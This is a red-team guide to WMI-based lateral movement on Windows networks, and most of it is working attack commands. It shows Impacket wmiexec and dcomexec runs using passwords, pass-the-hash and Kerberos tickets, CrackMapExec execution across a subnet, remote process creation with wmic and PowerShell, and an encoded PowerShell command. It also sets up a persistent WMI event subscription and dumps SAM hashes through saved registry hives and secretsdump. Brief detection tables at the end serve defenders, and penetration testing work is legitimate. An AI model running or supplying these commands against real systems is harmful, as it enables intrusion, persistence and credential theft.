Perform lateral movement across Windows networks using WMI-based remote execution techniques including Impacket wmiexec.py, CrackMapExec, and native WMI commands for stealthy post-exploitation during red team engagements.
WMI (Windows Management Instrumentation) is a legitimate Windows administration framework that red teams abuse for lateral movement because it provides remote command execution without deploying additional services or leaving obvious artifacts like PsExec. Impacket's wmiexec.py creates a semi-interactive shell over WMI by executing commands through Win32_Process.Create and reading output via temporary files on ADMIN$ share. Unlike PsExec, WMIExec does not install a service on the target, making it stealthier and less likely to trigger security alerts. WMI-based lateral movement maps to MITRE ATT&CK T1047 (Windows Management Instrumentation) and is used by threat actors including APT29, APT32, and Lazarus Group.
# With cleartext password
wmiexec.py domain.local/admin:'Password123'@10.10.10.50
# With NT hash (Pass-the-Hash)
wmiexec.py -hashes :a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4 domain.local/[email protected]
# With Kerberos ticket
export KRB5CCNAME=admin.ccache
wmiexec.py -k -no-pass domain.local/[email protected]
# Execute specific command (non-interactive)
wmiexec.py domain.local/admin:'Password123'@10.10.10.50 "ipconfig /all"
# Using dcomexec.py as alternative (MMC20.Application DCOM object)
dcomexec.py -object MMC20 domain.local/admin:'Password123'@10.10.10.50
# Using ShellWindows DCOM object
dcomexec.py -object ShellWindows domain.local/admin:'Password123'@10.10.10.50
# Execute single command on subnet
crackmapexec wmi 10.10.10.0/24 -u admin -p 'Password123' -x "whoami"
# Execute with hash
crackmapexec wmi 10.10.10.0/24 -u admin -H a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4 -x "ipconfig"
# Execute PowerShell command
crackmapexec wmi 10.10.10.0/24 -u admin -p 'Password123' -X "Get-Process"
# Check local admin access via WMI
crackmapexec wmi 10.10.10.0/24 -u admin -p 'Password123'
# Using wmic.exe (deprecated but still available)
wmic /node:10.10.10.50 /user:domain\admin /password:Password123 process call create "cmd.exe /c whoami > C:\temp\out.txt"
# Using PowerShell Invoke-WmiMethod
$cred = Get-Credential
Invoke-WmiMethod -Class Win32_Process -Name Create -ComputerName 10.10.10.50 `
-Credential $cred -ArgumentList "cmd.exe /c ipconfig > C:\temp\output.txt"
# Using CIM sessions (modern replacement for WMI)
$session = New-CimSession -ComputerName 10.10.10.50 -Credential $cred
Invoke-CimMethod -CimSession $session -ClassName Win32_Process `
-MethodName Create -Arguments @{CommandLine="cmd.exe /c whoami"}
# Execute encoded PowerShell command remotely
$cmd = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes('Get-Process | Out-File C:\temp\procs.txt'))
Invoke-WmiMethod -Class Win32_Process -Name Create -ComputerName 10.10.10.50 `
-Credential $cred -ArgumentList "powershell.exe -enc $cmd"
# Create WMI event subscription (command runs on every logon)
$filter = Set-WmiInstance -Namespace "root\subscription" -Class __EventFilter `
-Arguments @{Name="PersistFilter"; EventNamespace="root\cimv2";
QueryLanguage="WQL"; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"}
$consumer = Set-WmiInstance -Namespace "root\subscription" -Class CommandLineEventConsumer `
-Arguments @{Name="PersistConsumer"; CommandLineTemplate="cmd.exe /c <payload>"}
Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding `
-Arguments @{Filter=$filter; Consumer=$consumer}
# Dump SAM hashes via WMI + reg save
wmiexec.py domain.local/admin:'Password123'@10.10.10.50 "reg save HKLM\SAM C:\temp\sam && reg save HKLM\SYSTEM C:\temp\system"
# Download saved hives
smbclient.py domain.local/admin:'Password123'@10.10.10.50
> get C:\temp\sam
> get C:\temp\system
# Extract hashes from saved hives
secretsdump.py -sam sam -system system LOCAL
| Tool | Purpose | Platform |
|---|---|---|
| wmiexec.py | Semi-interactive WMI shell (Impacket) | Linux (Python) |
| dcomexec.py | DCOM-based remote execution (Impacket) | Linux (Python) |
| CrackMapExec | Multi-target WMI execution | Linux (Python) |
| wmic.exe | Native Windows WMI command-line tool | Windows |
| PowerShell CIM | Modern WMI cmdlets | Windows |
| SharpWMI | .NET WMI execution tool | Windows (.NET) |
| Method | Service Created | Output Method | Stealth Level |
|---|---|---|---|
| wmiexec.py | No | Temp file on ADMIN$ | Medium |
| dcomexec.py | No | Temp file on ADMIN$ | Medium-High |
| wmic.exe | No | None (blind) or redirect | Medium |
| PowerShell WMI | No | None (blind) or redirect | High |
| PsExec (comparison) | Yes | Service output pipe | Low |
| Indicator | Detection Method |
|---|---|
| Win32_Process.Create WMI calls | Event 4688 (process creation) with WMI parent process |
| WMI temporary output files on ADMIN$ | File monitoring on ADMIN$ share for temp files |
| Remote WMI connections (DCOM/135) | Network monitoring for DCOM traffic to workstations |
| WmiPrvSE.exe spawning cmd.exe/powershell.exe | EDR process tree analysis |
| Event 5857/5860/5861 | WMI Activity logs in Microsoft-Windows-WMI-Activity |